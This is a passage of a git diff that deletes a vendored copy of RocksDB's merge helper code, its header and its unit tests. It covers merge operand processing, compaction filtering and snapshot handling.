-  has_compaction_filter_skip_until_ = false;
-  assert(user_merge_operator_);
-  bool first_key = true;
-
-  // We need to parse the internal key again as the parsed key is
-  // backed by the internal key!
-  // Assume no internal key corruption as it has been successfully parsed
-  // by the caller.
-  // original_key_is_iter variable is just caching the information:
-  // original_key_is_iter == (iter->key().ToString() == original_key)
-  bool original_key_is_iter = true;
-  std::string original_key = iter->key().ToString();
-  // Important:
-  // orig_ikey is backed by original_key if keys_.empty()
-  // orig_ikey is backed by keys_.back() if !keys_.empty()
-  ParsedInternalKey orig_ikey;
-  ParseInternalKey(original_key, &orig_ikey);
-
-  Status s;
-  bool hit_the_next_user_key = false;
-  for (; iter->Valid(); iter->Next(), original_key_is_iter = false) {
-    if (IsShuttingDown()) {
-      return Status::ShutdownInProgress();
-    }
-
-    ParsedInternalKey ikey;
-    assert(keys_.size() == merge_context_.GetNumOperands());
-
-    if (!ParseInternalKey(iter->key(), &ikey)) {
-      // stop at corrupted key
-      if (assert_valid_internal_key_) {
-        assert(!"Corrupted internal key not expected.");
-        return Status::Corruption("Corrupted internal key not expected.");
-      }
-      break;
-    } else if (first_key) {
-      assert(user_comparator_->Equal(ikey.user_key, orig_ikey.user_key));
-      first_key = false;
-    } else if (!user_comparator_->Equal(ikey.user_key, orig_ikey.user_key)) {
-      // hit a different user key, stop right here
-      hit_the_next_user_key = true;
-      break;
-    } else if (stop_before && ikey.sequence <= stop_before) {
-      // hit an entry that's visible by the previous snapshot, can't touch that
-      break;
-    }
-
-    // At this point we are guaranteed that we need to process this key.
-
-    assert(IsValueType(ikey.type));
-    if (ikey.type != kTypeMerge) {
-
-      // hit a put/delete/single delete
-      //   => merge the put value or a nullptr with operands_
-      //   => store result in operands_.back() (and update keys_.back())
-      //   => change the entry type to kTypeValue for keys_.back()
-      // We are done! Success!
-
-      // If there are no operands, just return the Status::OK(). That will cause
-      // the compaction iterator to write out the key we're currently at, which
-      // is the put/delete we just encountered.
-      if (keys_.empty()) {
-        return Status::OK();
-      }
-
-      // TODO(noetzli) If the merge operator returns false, we are currently
-      // (almost) silently dropping the put/delete. That's probably not what we
-      // want. Also if we're in compaction and it's a put, it would be nice to
-      // run compaction filter on it.
-      const Slice val = iter->value();
-      const Slice* val_ptr = (kTypeValue == ikey.type) ? &val : nullptr;
-      std::string merge_result;
-      s = TimedFullMerge(user_merge_operator_, ikey.user_key, val_ptr,
-                         merge_context_.GetOperands(), &merge_result, logger_,
-                         stats_, env_);
-
-      // We store the result in keys_.back() and operands_.back()
-      // if nothing went wrong (i.e.: no operand corruption on disk)
-      if (s.ok()) {
-        // The original key encountered
-        original_key = std::move(keys_.back());
-        orig_ikey.type = kTypeValue;
-        UpdateInternalKey(&original_key, orig_ikey.sequence, orig_ikey.type);
-        keys_.clear();
-        merge_context_.Clear();
-        keys_.emplace_front(std::move(original_key));
-        merge_context_.PushOperand(merge_result);
-      }
-
-      // move iter to the next entry
-      iter->Next();
-      return s;
-    } else {
-      // hit a merge
-      //   => if there is a compaction filter, apply it.
-      //   => check for range tombstones covering the operand
-      //   => merge the operand into the front of the operands_ list
-      //      if not filtered
-      //   => then continue because we haven't yet seen a Put/Delete.
-      //
-      // Keep queuing keys and operands until we either meet a put / delete
-      // request or later did a partial merge.
-
-      Slice value_slice = iter->value();
-      // add an operand to the list if:
-      // 1) it's included in one of the snapshots. in that case we *must* write
-      // it out, no matter what compaction filter says
-      // 2) it's not filtered by a compaction filter
-      CompactionFilter::Decision filter =
-          ikey.sequence <= latest_snapshot_
-              ? CompactionFilter::Decision::kKeep
-              : FilterMerge(orig_ikey.user_key, value_slice);
-      if (filter != CompactionFilter::Decision::kRemoveAndSkipUntil &&
-          range_del_agg != nullptr &&
-          range_del_agg->ShouldDelete(
-              iter->key(),
-              RangeDelAggregator::RangePositioningMode::kForwardTraversal)) {
-        filter = CompactionFilter::Decision::kRemove;
-      }
-      if (filter == CompactionFilter::Decision::kKeep ||
-          filter == CompactionFilter::Decision::kChangeValue) {
-        if (original_key_is_iter) {
-          // this is just an optimization that saves us one memcpy
-          keys_.push_front(std::move(original_key));
-        } else {
-          keys_.push_front(iter->key().ToString());
-        }
-        if (keys_.size() == 1) {
-          // we need to re-anchor the orig_ikey because it was anchored by
-          // original_key before
-          ParseInternalKey(keys_.back(), &orig_ikey);
-        }
-        if (filter == CompactionFilter::Decision::kKeep) {
-          merge_context_.PushOperand(
-              value_slice, iter->IsValuePinned() /* operand_pinned */);
-        } else {  // kChangeValue
-          // Compaction filter asked us to change the operand from value_slice
-          // to compaction_filter_value_.
-          merge_context_.PushOperand(compaction_filter_value_, false);
-        }
-      } else if (filter == CompactionFilter::Decision::kRemoveAndSkipUntil) {
-        // Compaction filter asked us to remove this key altogether
-        // (not just this operand), along with some keys following it.
-        keys_.clear();
-        merge_context_.Clear();
-        has_compaction_filter_skip_until_ = true;
-        return Status::OK();
-      }
-    }
-  }
-
-  if (merge_context_.GetNumOperands() == 0) {
-    // we filtered out all the merge operands
-    return Status::OK();
-  }
-
-  // We are sure we have seen this key's entire history if we are at the
-  // last level and exhausted all internal keys of this user key.
-  // NOTE: !iter->Valid() does not necessarily mean we hit the
-  // beginning of a user key, as versions of a user key might be
-  // split into multiple files (even files on the same level)
-  // and some files might not be included in the compaction/merge.
-  //
-  // There are also cases where we have seen the root of history of this
-  // key without being sure of it. Then, we simply miss the opportunity
-  // to combine the keys. Since VersionSet::SetupOtherInputs() always makes
-  // sure that all merge-operands on the same level get compacted together,
-  // this will simply lead to these merge operands moving to the next level.
-  //
-  // So, we only perform the following logic (to merge all operands together
-  // without a Put/Delete) if we are certain that we have seen the end of key.
-  bool surely_seen_the_beginning = hit_the_next_user_key && at_bottom;
-  if (surely_seen_the_beginning) {
-    // do a final merge with nullptr as the existing value and say
-    // bye to the merge type (it's now converted to a Put)
-    assert(kTypeMerge == orig_ikey.type);
-    assert(merge_context_.GetNumOperands() >= 1);
-    assert(merge_context_.GetNumOperands() == keys_.size());
-    std::string merge_result;
-    s = TimedFullMerge(user_merge_operator_, orig_ikey.user_key, nullptr,
-                       merge_context_.GetOperands(), &merge_result, logger_,
-                       stats_, env_);
-    if (s.ok()) {
-      // The original key encountered
-      // We are certain that keys_ is not empty here (see assertions couple of
-      // lines before).
-      original_key = std::move(keys_.back());
-      orig_ikey.type = kTypeValue;
-      UpdateInternalKey(&original_key, orig_ikey.sequence, orig_ikey.type);
-      keys_.clear();
-      merge_context_.Clear();
-      keys_.emplace_front(std::move(original_key));
-      merge_context_.PushOperand(merge_result);
-    }
-  } else {
-    // We haven't seen the beginning of the key nor a Put/Delete.
-    // Attempt to use the user's associative merge function to
-    // merge the stacked merge operands into a single operand.
-    s = Status::MergeInProgress();
-    if (merge_context_.GetNumOperands() >= 2 ||
-        (allow_single_operand_ && merge_context_.GetNumOperands() == 1)) {
-      bool merge_success = false;
-      std::string merge_result;
-      {
-        StopWatchNano timer(env_, stats_ != nullptr);
-        PERF_TIMER_GUARD(merge_operator_time_nanos);
-        merge_success = user_merge_operator_->PartialMergeMulti(
-            orig_ikey.user_key,
-            std::deque<Slice>(merge_context_.GetOperands().begin(),
-                              merge_context_.GetOperands().end()),
-            &merge_result, logger_);
-        RecordTick(stats_, MERGE_OPERATION_TOTAL_TIME,
-                   stats_ ? timer.ElapsedNanosSafe() : 0);
-      }
-      if (merge_success) {
-        // Merging of operands (associative merge) was successful.
-        // Replace operands with the merge result
-        merge_context_.Clear();
-        merge_context_.PushOperand(merge_result);
-        keys_.erase(keys_.begin(), keys_.end() - 1);
-      }
-    }
-  }
-
-  return s;
-}
-
-MergeOutputIterator::MergeOutputIterator(const MergeHelper* merge_helper)
-    : merge_helper_(merge_helper) {
-  it_keys_ = merge_helper_->keys().rend();
-  it_values_ = merge_helper_->values().rend();
-}
-
-void MergeOutputIterator::SeekToFirst() {
-  const auto& keys = merge_helper_->keys();
-  const auto& values = merge_helper_->values();
-  assert(keys.size() == values.size());
-  it_keys_ = keys.rbegin();
-  it_values_ = values.rbegin();
-}
-
-void MergeOutputIterator::Next() {
-  ++it_keys_;
-  ++it_values_;
-}
-
-CompactionFilter::Decision MergeHelper::FilterMerge(const Slice& user_key,
-                                                    const Slice& value_slice) {
-  if (compaction_filter_ == nullptr) {
-    return CompactionFilter::Decision::kKeep;
-  }
-  if (stats_ != nullptr) {
-    filter_timer_.Start();
-  }
-  compaction_filter_value_.clear();
-  compaction_filter_skip_until_.Clear();
-  auto ret = compaction_filter_->FilterV2(
-      level_, user_key, CompactionFilter::ValueType::kMergeOperand, value_slice,
-      &compaction_filter_value_, compaction_filter_skip_until_.rep());
-  if (ret == CompactionFilter::Decision::kRemoveAndSkipUntil) {
-    if (user_comparator_->Compare(*compaction_filter_skip_until_.rep(),
-                                  user_key) <= 0) {
-      // Invalid skip_until returned from compaction filter.
-      // Keep the key as per FilterV2 documentation.
-      ret = CompactionFilter::Decision::kKeep;
-    } else {
-      compaction_filter_skip_until_.ConvertFromUserKey(kMaxSequenceNumber,
-                                                       kValueTypeForSeek);
-    }
-  }
-  total_filter_time_ += filter_timer_.ElapsedNanosSafe();
-  return ret;
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/merge_helper.h b/thirdparty/rocksdb/db/merge_helper.h
deleted file mode 100644
index b9ef12a..0000000
--- a/thirdparty/rocksdb/db/merge_helper.h
+++ /dev/null
@@ -1,195 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef MERGE_HELPER_H
-#define MERGE_HELPER_H
-
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-class Comparator;
-class Iterator;
-class Logger;
-class MergeOperator;
-class Statistics;
-class InternalIterator;
-
-class MergeHelper {
- public:
-  MergeHelper(Env* env, const Comparator* user_comparator,
-              const MergeOperator* user_merge_operator,
-              const CompactionFilter* compaction_filter, Logger* logger,
-              bool assert_valid_internal_key, SequenceNumber latest_snapshot,
-              int level = 0, Statistics* stats = nullptr,
-              const std::atomic<bool>* shutting_down = nullptr);
-
-  // Wrapper around MergeOperator::FullMergeV2() that records perf statistics.
-  // Result of merge will be written to result if status returned is OK.
-  // If operands is empty, the value will simply be copied to result.
-  // Set `update_num_ops_stats` to true if it is from a user read, so that
-  // the latency is sensitive.
-  // Returns one of the following statuses:
-  // - OK: Entries were successfully merged.
-  // - Corruption: Merge operator reported unsuccessful merge.
-  static Status TimedFullMerge(const MergeOperator* merge_operator,
-                               const Slice& key, const Slice* value,
-                               const std::vector<Slice>& operands,
-                               std::string* result, Logger* logger,
-                               Statistics* statistics, Env* env,
-                               Slice* result_operand = nullptr,
-                               bool update_num_ops_stats = false);
-
-  // Merge entries until we hit
-  //     - a corrupted key
-  //     - a Put/Delete,
-  //     - a different user key,
-  //     - a specific sequence number (snapshot boundary),
-  //     - REMOVE_AND_SKIP_UNTIL returned from compaction filter,
-  //  or - the end of iteration
-  // iter: (IN)  points to the first merge type entry
-  //       (OUT) points to the first entry not included in the merge process
-  // range_del_agg: (IN) filters merge operands covered by range tombstones.
-  // stop_before: (IN) a sequence number that merge should not cross.
-  //                   0 means no restriction
-  // at_bottom:   (IN) true if the iterator covers the bottem level, which means
-  //                   we could reach the start of the history of this user key.
-  //
-  // Returns one of the following statuses:
-  // - OK: Entries were successfully merged.
-  // - MergeInProgress: Put/Delete not encountered, and didn't reach the start
-  //   of key's history. Output consists of merge operands only.
-  // - Corruption: Merge operator reported unsuccessful merge or a corrupted
-  //   key has been encountered and not expected (applies only when compiling
-  //   with asserts removed).
-  // - ShutdownInProgress: interrupted by shutdown (*shutting_down == true).
-  //
-  // REQUIRED: The first key in the input is not corrupted.
-  Status MergeUntil(InternalIterator* iter,
-                    RangeDelAggregator* range_del_agg = nullptr,
-                    const SequenceNumber stop_before = 0,
-                    const bool at_bottom = false);
-
-  // Filters a merge operand using the compaction filter specified
-  // in the constructor. Returns the decision that the filter made.
-  // Uses compaction_filter_value_ and compaction_filter_skip_until_ for the
-  // optional outputs of compaction filter.
-  CompactionFilter::Decision FilterMerge(const Slice& user_key,
-                                         const Slice& value_slice);
-
-  // Query the merge result
-  // These are valid until the next MergeUntil call
-  // If the merging was successful:
-  //   - keys() contains a single element with the latest sequence number of
-  //     the merges. The type will be Put or Merge. See IMPORTANT 1 note, below.
-  //   - values() contains a single element with the result of merging all the
-  //     operands together
-  //
-  //   IMPORTANT 1: the key type could change after the MergeUntil call.
-  //        Put/Delete + Merge + ... + Merge => Put
-  //        Merge + ... + Merge => Merge
-  //
-  // If the merge operator is not associative, and if a Put/Delete is not found
-  // then the merging will be unsuccessful. In this case:
-  //   - keys() contains the list of internal keys seen in order of iteration.
-  //   - values() contains the list of values (merges) seen in the same order.
-  //              values() is parallel to keys() so that the first entry in
-  //              keys() is the key associated with the first entry in values()
-  //              and so on. These lists will be the same length.
-  //              All of these pairs will be merges over the same user key.
-  //              See IMPORTANT 2 note below.
-  //
-  //   IMPORTANT 2: The entries were traversed in order from BACK to FRONT.
-  //                So keys().back() was the first key seen by iterator.
-  // TODO: Re-style this comment to be like the first one
-  const std::deque<std::string>& keys() const { return keys_; }
-  const std::vector<Slice>& values() const {
-    return merge_context_.GetOperands();
-  }
-  uint64_t TotalFilterTime() const { return total_filter_time_; }
-  bool HasOperator() const { return user_merge_operator_ != nullptr; }
-
-  // If compaction filter returned REMOVE_AND_SKIP_UNTIL, this method will
-  // return true and fill *until with the key to which we should skip.
-  // If true, keys() and values() are empty.
-  bool FilteredUntil(Slice* skip_until) const {
-    if (!has_compaction_filter_skip_until_) {
-      return false;
-    }
-    assert(compaction_filter_ != nullptr);
-    assert(skip_until != nullptr);
-    assert(compaction_filter_skip_until_.Valid());
-    *skip_until = compaction_filter_skip_until_.Encode();
-    return true;
-  }
-
- private:
-  Env* env_;
-  const Comparator* user_comparator_;
-  const MergeOperator* user_merge_operator_;
-  const CompactionFilter* compaction_filter_;
-  const std::atomic<bool>* shutting_down_;
-  Logger* logger_;
-  bool assert_valid_internal_key_; // enforce no internal key corruption?
-  bool allow_single_operand_;
-  SequenceNumber latest_snapshot_;
-  int level_;
-
-  // the scratch area that holds the result of MergeUntil
-  // valid up to the next MergeUntil call
-
-  // Keeps track of the sequence of keys seen
-  std::deque<std::string> keys_;
-  // Parallel with keys_; stores the operands
-  mutable MergeContext merge_context_;
-
-  StopWatchNano filter_timer_;
-  uint64_t total_filter_time_;
-  Statistics* stats_;
-
-  bool has_compaction_filter_skip_until_ = false;
-  std::string compaction_filter_value_;
-  InternalKey compaction_filter_skip_until_;
-
-  bool IsShuttingDown() {
-    // This is a best-effort facility, so memory_order_relaxed is sufficient.
-    return shutting_down_ && shutting_down_->load(std::memory_order_relaxed);
-  }
-};
-
-// MergeOutputIterator can be used to iterate over the result of a merge.
-class MergeOutputIterator {
- public:
-  // The MergeOutputIterator is bound to a MergeHelper instance.
-  explicit MergeOutputIterator(const MergeHelper* merge_helper);
-
-  // Seeks to the first record in the output.
-  void SeekToFirst();
-  // Advances to the next record in the output.
-  void Next();
-
-  Slice key() { return Slice(*it_keys_); }
-  Slice value() { return Slice(*it_values_); }
-  bool Valid() { return it_keys_ != merge_helper_->keys().rend(); }
-
- private:
-  const MergeHelper* merge_helper_;
-  std::deque<std::string>::const_reverse_iterator it_keys_;
-  std::vector<Slice>::const_reverse_iterator it_values_;
-};
-
-} // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/db/merge_helper_test.cc b/thirdparty/rocksdb/db/merge_helper_test.cc
deleted file mode 100644
index dc43db0..0000000
--- a/thirdparty/rocksdb/db/merge_helper_test.cc
+++ /dev/null
@@ -1,290 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/merge_helper.h"
-#include "rocksdb/comparator.h"
-#include "util/coding.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-class MergeHelperTest : public testing::Test {
- public:
-  MergeHelperTest() { env_ = Env::Default(); }
-
-  ~MergeHelperTest() = default;
-
-  Status Run(SequenceNumber stop_before, bool at_bottom,
-             SequenceNumber latest_snapshot = 0) {
-    iter_.reset(new test::VectorIterator(ks_, vs_));
-    iter_->SeekToFirst();
-    merge_helper_.reset(new MergeHelper(env_, BytewiseComparator(),
-                                        merge_op_.get(), filter_.get(), nullptr,
-                                        false, latest_snapshot));
-    return merge_helper_->MergeUntil(iter_.get(), nullptr /* range_del_agg */,
-                                     stop_before, at_bottom);
-  }
-
-  void AddKeyVal(const std::string& user_key, const SequenceNumber& seq,
-                 const ValueType& t, const std::string& val,
-                 bool corrupt = false) {
-    InternalKey ikey(user_key, seq, t);
-    if (corrupt) {
-      test::CorruptKeyType(&ikey);
-    }
-    ks_.push_back(ikey.Encode().ToString());
-    vs_.push_back(val);
-  }
-
-  Env* env_;
-  std::unique_ptr<test::VectorIterator> iter_;
-  std::shared_ptr<MergeOperator> merge_op_;
-  std::unique_ptr<MergeHelper> merge_helper_;
-  std::vector<std::string> ks_;
-  std::vector<std::string> vs_;
-  std::unique_ptr<test::FilterNumber> filter_;
-};
-
-// If MergeHelper encounters a new key on the last level, we know that
-// the key has no more history and it can merge keys.
-TEST_F(MergeHelperTest, MergeAtBottomSuccess) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 20, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 10, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("b", 10, kTypeMerge, test::EncodeInt(4U));  // <- iter_ after merge
-
-  ASSERT_TRUE(Run(0, true).ok());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 20, kTypeValue), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(4U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// Merging with a value results in a successful merge.
-TEST_F(MergeHelperTest, MergeValue) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 40, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 20, kTypeValue, test::EncodeInt(4U));  // <- iter_ after merge
-  AddKeyVal("a", 10, kTypeMerge, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(0, false).ok());
-  ASSERT_EQ(ks_[3], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 40, kTypeValue), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(8U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// Merging stops before a snapshot.
-TEST_F(MergeHelperTest, SnapshotBeforeValue) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 50, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 40, kTypeMerge, test::EncodeInt(3U));  // <- iter_ after merge
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 20, kTypeValue, test::EncodeInt(4U));
-  AddKeyVal("a", 10, kTypeMerge, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(31, true).IsMergeInProgress());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(4U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// MergeHelper preserves the operand stack for merge operators that
-// cannot do a partial merge.
-TEST_F(MergeHelperTest, NoPartialMerge) {
-  merge_op_ = MergeOperators::CreateStringAppendTESTOperator();
-
-  AddKeyVal("a", 50, kTypeMerge, "v2");
-  AddKeyVal("a", 40, kTypeMerge, "v");  // <- iter_ after merge
-  AddKeyVal("a", 30, kTypeMerge, "v");
-
-  ASSERT_TRUE(Run(31, true).IsMergeInProgress());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 40, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ("v", merge_helper_->values()[0]);
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), merge_helper_->keys()[1]);
-  ASSERT_EQ("v2", merge_helper_->values()[1]);
-  ASSERT_EQ(2U, merge_helper_->keys().size());
-  ASSERT_EQ(2U, merge_helper_->values().size());
-}
-
-// A single operand can not be merged.
-TEST_F(MergeHelperTest, SingleOperand) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 50, kTypeMerge, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(31, true).IsMergeInProgress());
-  ASSERT_FALSE(iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(1U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// Merging with a deletion turns the deletion into a value
-TEST_F(MergeHelperTest, MergeDeletion) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 20, kTypeDeletion, "");
-
-  ASSERT_TRUE(Run(15, false).ok());
-  ASSERT_FALSE(iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 30, kTypeValue), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(3U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// The merge helper stops upon encountering a corrupt key
-TEST_F(MergeHelperTest, CorruptKey) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(1U));
-  // Corrupt key
-  AddKeyVal("a", 20, kTypeDeletion, "", true);  // <- iter_ after merge
-
-  ASSERT_TRUE(Run(15, false).IsMergeInProgress());
-  ASSERT_EQ(ks_[2], iter_->key());
-  ASSERT_EQ(test::KeyStr("a", 30, kTypeMerge), merge_helper_->keys()[0]);
-  ASSERT_EQ(test::EncodeInt(4U), merge_helper_->values()[0]);
-  ASSERT_EQ(1U, merge_helper_->keys().size());
-  ASSERT_EQ(1U, merge_helper_->values().size());
-}
-
-// The compaction filter is called on every merge operand
-TEST_F(MergeHelperTest, FilterMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 25, kTypeValue, test::EncodeInt(1U));
-
-  ASSERT_TRUE(Run(15, false).ok());
-  ASSERT_FALSE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  ASSERT_EQ(test::KeyStr("a", 30, kTypeValue),
-            merge_output_iter.key().ToString());
-  ASSERT_EQ(test::EncodeInt(8U), merge_output_iter.value().ToString());
-  merge_output_iter.Next();
-  ASSERT_FALSE(merge_output_iter.Valid());
-}
-
-TEST_F(MergeHelperTest, FilterAllMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(5U));
-
-  // filtered out all
-  ASSERT_TRUE(Run(15, false).ok());
-  ASSERT_FALSE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  ASSERT_FALSE(merge_output_iter.Valid());
-
-  // we have one operand that will survive because it's a delete
-  AddKeyVal("a", 24, kTypeDeletion, test::EncodeInt(5U));
-  AddKeyVal("b", 23, kTypeValue, test::EncodeInt(5U));
-  ASSERT_TRUE(Run(15, true).ok());
-  merge_output_iter = MergeOutputIterator(merge_helper_.get());
-  ASSERT_TRUE(iter_->Valid());
-  merge_output_iter.SeekToFirst();
-  ASSERT_FALSE(merge_output_iter.Valid());
-
-  // when all merge operands are filtered out, we leave the iterator pointing to
-  // the Put/Delete that survived
-  ASSERT_EQ(test::KeyStr("a", 24, kTypeDeletion), iter_->key().ToString());
-  ASSERT_EQ(test::EncodeInt(5U), iter_->value().ToString());
-}
-
-// Make sure that merge operands are filtered at the beginning
-TEST_F(MergeHelperTest, FilterFirstMergeOperand) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 31, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(2U));
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(5U));  // Filtered
-  AddKeyVal("b", 24, kTypeValue, test::EncodeInt(5U));  // next user key
-
-  ASSERT_OK(Run(15, true));
-  ASSERT_TRUE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  // sequence number is 29 here, because the first merge operand got filtered
-  // out
-  ASSERT_EQ(test::KeyStr("a", 29, kTypeValue),
-            merge_output_iter.key().ToString());
-  ASSERT_EQ(test::EncodeInt(6U), merge_output_iter.value().ToString());
-  merge_output_iter.Next();
-  ASSERT_FALSE(merge_output_iter.Valid());
-
-  // make sure that we're passing user keys into the filter
-  ASSERT_EQ("a", filter_->last_merge_operand_key());
-}
-
-// Make sure that merge operands are not filtered out if there's a snapshot
-// pointing at them
-TEST_F(MergeHelperTest, DontFilterMergeOperandsBeforeSnapshotTest) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  filter_.reset(new test::FilterNumber(5U));
-
-  AddKeyVal("a", 31, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 30, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 29, kTypeMerge, test::EncodeInt(2U));
-  AddKeyVal("a", 28, kTypeMerge, test::EncodeInt(1U));
-  AddKeyVal("a", 27, kTypeMerge, test::EncodeInt(3U));
-  AddKeyVal("a", 26, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("a", 25, kTypeMerge, test::EncodeInt(5U));
-  AddKeyVal("b", 24, kTypeValue, test::EncodeInt(5U));
-
-  ASSERT_OK(Run(15, true, 32));
-  ASSERT_TRUE(iter_->Valid());
-  MergeOutputIterator merge_output_iter(merge_helper_.get());
-  merge_output_iter.SeekToFirst();
-  ASSERT_EQ(test::KeyStr("a", 31, kTypeValue),
-            merge_output_iter.key().ToString());
-  ASSERT_EQ(test::EncodeInt(26U), merge_output_iter.value().ToString());
-  merge_output_iter.Next();
-  ASSERT_FALSE(merge_output_iter.Valid());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/merge_operator.cc b/thirdparty/rocksdb/db/merge_operator.cc
deleted file mode 100644
index 1981e65..0000000
--- a/thirdparty/rocksdb/db/merge_operator.cc
+++ /dev/null
@@ -1,86 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-/**
- * Back-end implementation details specific to the Merge Operator.
- */
-
-#include "rocksdb/merge_operator.h"
-
-namespace rocksdb {
-
-bool MergeOperator::FullMergeV2(const MergeOperationInput& merge_in,
-                                MergeOperationOutput* merge_out) const {
-  // If FullMergeV2 is not implemented, we convert the operand_list to
-  // std::deque<std::string> and pass it to FullMerge
-  std::deque<std::string> operand_list_str;
-  for (auto& op : merge_in.operand_list) {
